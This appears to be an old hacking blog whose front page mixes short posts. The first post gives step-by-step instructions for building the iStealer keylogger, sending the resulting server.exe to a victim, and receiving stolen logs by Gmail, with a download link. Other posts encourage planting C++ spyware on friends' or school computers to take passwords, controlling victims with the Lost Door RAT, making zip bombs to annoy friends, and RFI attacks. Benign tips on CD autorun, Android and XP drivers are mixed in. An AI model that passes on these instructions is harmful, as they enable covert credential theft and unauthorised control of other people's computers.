Hackers Heaven

Sunday, November 6, 2011

Download iStealer keylogger | Remote keylogger






How To Use This Remote Keylogger :-

  • Download keylogger from below and extract that 
  • Give them the required information
  • Create New Gmail Account Specially for keylogger ( its recommended )
  • And Log that gmail username and password in keylogger
  • Now Click on build
  • It will create a server.exe
  • Send that Server.exe to victim and ask them to run
  • You done the all task now you will receive the logs to the given gmail account



Download
http://www.4shared.com/file/Tet-HG26/iStealer_30.html


NOTE: i will not responsible for any kind of harm you will make to you or others

Sunday, October 9, 2011

Create a CD autorun file

If you have produced the contents for your CD and then want them to autoplay when the disc is loaded into a computer then you should add an autorun file to the CD. An autorun file is a simple text file that tells the operating system which executable file to start.
There are two main types of autorun file that you could use:
Autorun using the 'open' command
The open command is compatible with any PC running Windows 95 or later (although it is possible to manually disable the autorun feature on any computer, so if someone cannot view your autorun application then this may be a reason). However it can only be used for opening executable files ending in .exe such as Flash presentations, it cannot be used for opening documents such as Word files, PDFs or web pages. To open documents rather than executable files using autorun please look at the shellexecute command instructions below.

Sunday, September 25, 2011

Create Keylogger using C++|Basic Hacking Tutorials

Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.

Friday, September 16, 2011

Saturday, September 10, 2011

Google Android on Your PC

Google Android

Google Android will not replace Windows as the operating system for your PC, but it may become the operating system for your next portable computer. Right now, you may test drive Google Android on your PC, and you may download programming tools to begin developing your own applications. Verizon and AT&T are already advertising small netbooks; four other major hardware manufacturers will introduce Adroid-powered netbooks early in 2010.

Your cell phone has evolved into a handheld computer


Although you still refer to the device as your cell “phone,” you hardly ever use it for simple conversation. Instead, you send text messages, get directions, play games, and check the links with your Facebook and Twitter. Your cell has evolved into a powerful handheld computer with more ROM and RAM than your desktop unit had just a few years ago. Until recently, Apple’s revolutionary iPhone owned the market, facing very little serious competition. Blackberry dominated the business market but accounted for only 15% of United States market share. At the end of October, 2009,

Thursday, August 11, 2011

How to find admin page 90% of websites

Learn how to find admin page for like 90% of websites
I can see that many of you is unable or don't know how to find the admin login page for the control panel of a website so i though about writing a little tutorial about the method i use to find admins login pages.............

First of all here are the tools you will need to do the job:
Download here:-


After that download the admin finder:
http://uploading.com/files/b169bm53/admin%2Blogin%2Bfinder%2Bin%2Bperl%2Blanguage.rar/here


Monday, August 8, 2011

How to hide files in JPEG pictures

You can actually hide any type of file inside of an image file, including txt, exe, mp3, avi, or whatever else. Not only that, you can actually store many files inside of single JPG file, not just one! This can come in very handy if you need to hide files and don’t want to bother with encryption and all that other technical stuff.

Hide File in Picture


Sunday, August 7, 2011

Running Multiple Instances of Google Talk

Users of Google Talk (GTalk) can also let GTalk go to polygamy, that’s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be done without any crack, patch or hack, with just a simple command line parameter or switch /nomutex appended to the Google Talk shortcut.

Ability to polygamy running multiple Google Talk is useful if users have multiple Google Talk accounts (or Google or Gmail accounts that used to login to GTalk) or multiple profiles or personalities, and don’t want to log on and off from one account to another account every time when want to switch, or want to log in to all accounts at the same time on the same computer.

Reset Your Mobile Memory Card Password

We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.



How to find the “real” IP address of a web site?

You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address.
To run the PING utility, click on the Windows Start button, and choose Run from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen.

Thursday, August 4, 2011

Resolve “Setup did not any hard disks drive” error while installing XP over a laptop

sometimes for compatibility reasons, but also because a lot of people just don't like 7 very much.
The problem that people keep running into left and right is getting to the point where XP starts to install and getting the message "Setup did not find any hard disk drives installed in your computer". This error happens because your new computer has a storage controller that isn't supported natively in XP, usually an SATA (Serial ATA) controller.

If you don't have a floppy drive in your computer (who does anymore), then you'll need to use a process called slip-streaming to integrate the storage drivers into your XP installation CD.
It should go without saying that this is an advanced topic, so proceed with caution.

Tuesday, July 5, 2011

How to Control a Remote Computer using Lost Door

Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim’s computer. Using a RAT you can do a lot of cool things such as “Upload, delete or modify data” , “Edit registry”, “Capture victim’s screen shot”, “Take control of victim’s Computer”or “Execute a virus” just with a click of a button.
Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.



Friday, July 1, 2011

Mousezahn - Open source free fast traffic generator and packet crafter tooll

Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible  packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems are hardened enough for specific attacks.
Mausezahn can be used for example:


Analyze your packets using xtractr

xtractr is a hybrid cloud application for indexing, searching, reporting, extracting and collaborating on pcaps. This enables you to rapidly identify field issues and perform network forensics and troubleshooting with just a few clicks. The lite version of xtractr can index up to 10 million packets or 1 Gbyte of pcaps.


Monday, June 27, 2011

An Introduction to Revrerse Engineering - Reversing Winrar step by step

Hi folks,its been a long time since I have posted some thing technical,so I will be writing about the challenge I got at NIT KU, where I reverse engineered WinRAR 3.80 using a disassembler and will tell you the same here. Furthermore, major software are analysed using the same way,but just get a bit complex in the methodology. This tutorial is intended for those who are new to reverse engineering and disassembling.

Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.

Saturday, June 25, 2011

How not to get Hacked – Choosing the Right Password

Its a digital nightmare when your password gets hacked. Password compromise = your are fucked, straight away. And if  you do happen to be at an important position in a firm, and unfortunately find yourself the root cause of company’s security problems, its time to learn a few basics of choosing the right password. Be it your Email ID, terminal login, voicemail or anything that uses a generic password protection system,you need to choose a secure password for your digital ventures. Nevertheless, this simple guide is applicable to every netizen online who wants to secure himself by choosing the right password. Cause in the end, its your password that makes it easy, or hard for attackers to gain access to your account.


GNS 3 Tutorial – Basic Router password Configuration

Hi folks..I have started my first steps into Cisco, & would be sharing my small experiments in it. Actually , this time I am  covering the basics using GNS3 which is a powerful open source network simulator to simulate a simple topology of 2 routers with their basic configuration & commands. I assume you have worked with GNS3 or atleast know how to load IOS & make a simple topology..
So, firstly download GNS3 & install it. Get IOS images from and load them (if you are really not sure of this step, mail me, I will expand the basics more)
The topology I created is this -


Create a Zip Bomb - Zip of Death

A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writers to disable antivirus software, so that a more traditional virus sent afterwards could get into system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't detonate it on yourself.


A simple tutorial on Remote File Inclusion (RFI)

RFI stands for Remote File Inclusion, and it allows the attacker to upload a
 custom coded/malicious file on a website or server using a script. The vulnerability  exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.